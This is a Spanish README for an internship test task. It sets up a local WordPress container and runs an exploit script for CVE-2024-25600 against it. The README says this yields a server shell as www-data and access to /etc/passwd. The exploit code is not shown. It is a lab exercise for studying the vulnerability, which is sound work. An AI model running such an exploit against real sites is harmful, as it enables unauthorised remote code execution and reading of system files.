
Repositorio para tarea de prueba de prácticas.
Repositorio para la tarea de prueba de la pasantía.
git clone https://github.com/Sibul-Dan-Glokta/test-task-CVE-2024-25600
sudo systemctl start docker.service
Para iniciar el contenedor Docker, navega al directorio wp_container
cd ruta/a/wp_container
Inicia los contenedores Docker
sudo docker compose up -d
El sitio WP puede tardar aproximadamente 30 segundos en funcionar correctamente. Para validar si la página de WP se inició, ejecuta el siguiente comando:
curl http://127.0.0.1:8080
La salida debería mostrar código HTML y sin errores.
python -m venv /ruta/a/nuevo/entorno/virtual
Para instalar las dependencias necesarias, navega al directorio del exploit y ejecuta el siguiente comando:
/ruta/a/nuevo/entorno/virtual/bin/pip install -r requirements.txt
Mientras estés en el directorio del exploit, para ejecutar el exploit ejecuta el siguiente comando:
/ruta/a/nuevo/entorno/virtual/bin/python3 exploit.py -u http://127.0.0.1:8080
Esto te dará acceso al shell del servidor como www-data. Y tendrás acceso a /etc/passwd.
Salida del script del exploit y whoami
